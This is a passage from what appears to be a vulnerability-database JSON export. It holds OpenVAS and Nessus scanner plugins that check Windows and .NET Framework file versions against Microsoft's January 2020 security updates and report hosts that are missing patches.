exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.17134\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item 
(registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\")){\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n 
}\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "description": "This host is missing a critical security\n update according to Microsoft KB4534306", "modified": "2020-07-17T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815745", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815745", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4534306)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815745\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0615\", \"CVE-2020-0617\",\n \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0611\", \"CVE-2020-0614\",\n \"CVE-2020-0613\", \"CVE-2020-0620\", \"CVE-2020-0622\", \"CVE-2020-0625\",\n \"CVE-2020-0626\", \"CVE-2020-0627\", \"CVE-2020-0628\", \"CVE-2020-0629\",\n \"CVE-2020-0630\", \"CVE-2020-0631\", \"CVE-2020-0632\", \"CVE-2020-0634\",\n \"CVE-2020-0635\", \"CVE-2020-0639\", \"CVE-2020-0644\", \"CVE-2020-0641\",\n \"CVE-2020-0642\", \"CVE-2020-0643\", \"CVE-2020-0606\", \"CVE-2020-0605\",\n \"CVE-2020-0646\", \"CVE-2020-0640\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 09:03:19 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534306)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534306\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows Search Indexer improperly handles objects in memory.\n\n - Microsoft Windows Graphics Component improperly handles objects in memory.\n\n - Microsoft Cryptographic Services improperly handles files.\n\n - Microsoft Windows implements predictable memory section names.\n\n - Windows Media 
Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Graphics Device Interface Plus (GDI+) improperly handles objects\n in memory.\n\n - Windows Common Log File System (CLFS) driver improperly handles objects\n in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to execute arbitrary code, elevate privileges, disclose sensitive\n information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534306\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.10240.0\", test_version2:\"10.0.10240.18452\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.10240.0 - 10.0.10240.18452\");\n 
security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0621", "CVE-2020-0638", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "description": "This host is missing a critical security\n update according to Microsoft KB4534276", "modified": "2020-07-17T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815740", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815740", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4534276)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815740\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0615\", \"CVE-2020-0617\",\n \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0611\", \"CVE-2020-0613\",\n \"CVE-2020-0614\", \"CVE-2020-0620\", \"CVE-2020-0621\", \"CVE-2020-0622\",\n \"CVE-2020-0625\", \"CVE-2020-0626\", \"CVE-2020-0627\", \"CVE-2020-0628\",\n \"CVE-2020-0629\", \"CVE-2020-0630\", \"CVE-2020-0631\", \"CVE-2020-0632\",\n \"CVE-2020-0633\", \"CVE-2020-0634\", \"CVE-2020-0635\", \"CVE-2020-0638\",\n \"CVE-2020-0639\", \"CVE-2020-0644\", \"CVE-2020-0641\", \"CVE-2020-0642\",\n \"CVE-2020-0643\", \"CVE-2020-0606\", \"CVE-2020-0640\", \"CVE-2020-0605\",\n \"CVE-2020-0646\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 08:48:53 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534276)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534276\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft Graphics Components improperly handles objects in memory.\n\n - Windows Common Log File System (CLFS) driver fails to properly handle\n objects in memory.\n\n - Windows Search Indexer handles objects in memory.\n\n - Microsoft 
Windows implements predictable memory section names.\n\n - Windows Media Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, bypass security features, elevate privileges,\n disclose sensitive information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534276\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.16299.0\", test_version2:\"10.0.16299.1624\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.16299.0 - 10.0.16299.1624\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0621", "CVE-2020-0638", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "description": "This host is missing a critical security\n update according to Microsoft KB4534293", "modified": "2020-07-17T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815744", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815744", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4534293)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815744\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0615\", \"CVE-2020-0617\",\n \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0611\", \"CVE-2020-0613\",\n \"CVE-2020-0614\", \"CVE-2020-0620\", \"CVE-2020-0621\", \"CVE-2020-0622\",\n \"CVE-2020-0625\", \"CVE-2020-0626\", \"CVE-2020-0627\", \"CVE-2020-0628\",\n \"CVE-2020-0629\", \"CVE-2020-0630\", \"CVE-2020-0631\", \"CVE-2020-0632\",\n \"CVE-2020-0633\", \"CVE-2020-0634\", \"CVE-2020-0635\", \"CVE-2020-0638\",\n \"CVE-2020-0639\", \"CVE-2020-0644\", \"CVE-2020-0641\", \"CVE-2020-0642\",\n \"CVE-2020-0643\", \"CVE-2020-0606\", \"CVE-2020-0605\", \"CVE-2020-0646\",\n \"CVE-2020-0640\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 09:01:33 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534293)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534293\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows Common Log File System (CLFS) driver when it fails to properly\n handle objects in memory.\n\n - Windows Search Indexer improperly handles objects in memory.\n\n - Microsoft Windows Graphics Component improperly handles objects in 
memory.\n\n - Microsoft Windows implements predictable memory section names.\n\n - Windows Media Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Graphics Device Interface Plus (GDI+) improperly handles objects in memory.\n\n - Win32k component fails to properly handle objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, bypass security features, elevate privileges, disclose\n sensitive information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1803 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1803 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please\n see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534293\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.17134.0\", test_version2:\"10.0.17134.1245\")) {\n report = 
report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.17134.0 - 10.0.17134.1245\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0609", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0637", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0610", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0612", "CVE-2020-0608"], "description": "This host is missing a critical security\n update according to Microsoft KB4534271", "modified": "2020-07-17T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815742", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815742", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4534271)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815742\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0612\", \"CVE-2020-0615\",\n \"CVE-2020-0617\", \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0609\",\n \"CVE-2020-0610\", \"CVE-2020-0611\", \"CVE-2020-0614\", \"CVE-2020-0613\",\n \"CVE-2020-0620\", \"CVE-2020-0622\", \"CVE-2020-0625\", \"CVE-2020-0626\",\n \"CVE-2020-0627\", \"CVE-2020-0628\", \"CVE-2020-0629\", \"CVE-2020-0630\",\n \"CVE-2020-0631\", \"CVE-2020-0632\", \"CVE-2020-0633\", \"CVE-2020-0634\",\n \"CVE-2020-0635\", \"CVE-2020-0637\", \"CVE-2020-0639\", \"CVE-2020-0644\",\n \"CVE-2020-0641\", \"CVE-2020-0642\", \"CVE-2020-0643\", \"CVE-2020-0606\",\n \"CVE-2020-0646\", \"CVE-2020-0640\", \"CVE-2020-0605\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 08:57:53 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534271)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534271\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows Common Log File System (CLFS) driver when it fails to properly\n handle objects in memory.\n\n - Windows Search Indexer improperly handles objects in memory.\n\n - win32k component improperly 
provides kernel information.\n\n - Microsoft Windows Graphics Component improperly handles objects in\n memory.\n\n - Microsoft Windows implements predictable memory section names.\n\n - Windows Media Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Graphics Device Interface Plus (GDI+) improperly handles objects\n in memory.\n\n - Remote Desktop Web Access improperly handles credential information.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to execute arbitrary code, elevate privileges, disclose sensitive\n information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534271\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.14393.0\", 
test_version2:\"10.0.14393.3442\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.14393.0 - 10.0.14393.3442\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-03-27T10:29:17", "description": "The Microsoft .NET Framework installation on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)", "edition": 5, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-16T00:00:00", "title": "Security Updates for Microsoft .NET Framework (January 2020)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-01-16T00:00:00", "cpe": ["cpe:/a:microsoft:.net_framework"], "id": "SMB_NT_MS20_JAN_DOTNET.NASL", "href": "https://www.tenable.com/plugins/nessus/132999", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132999);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\"CVE-2020-0605\", \"CVE-2020-0606\", \"CVE-2020-0646\");\n script_xref(name:\"MSKB\", value:\"4532935\");\n script_xref(name:\"MSKB\", value:\"4535101\");\n script_xref(name:\"MSKB\", value:\"4535103\");\n script_xref(name:\"MSKB\", value:\"4535102\");\n script_xref(name:\"MSKB\", value:\"4535105\");\n script_xref(name:\"MSKB\", value:\"4535104\");\n script_xref(name:\"MSKB\", value:\"4532933\");\n script_xref(name:\"MSKB\", value:\"4534271\");\n script_xref(name:\"MSKB\", value:\"4532938\");\n script_xref(name:\"MSKB\", value:\"4534306\");\n script_xref(name:\"MSKB\", value:\"4534977\");\n script_xref(name:\"MSKB\", value:\"4534976\");\n script_xref(name:\"MSKB\", value:\"4532936\");\n script_xref(name:\"MSKB\", value:\"4534276\");\n script_xref(name:\"MSKB\", value:\"4534293\");\n script_xref(name:\"MSKB\", value:\"4534979\");\n script_xref(name:\"MSKB\", value:\"4534978\");\n 
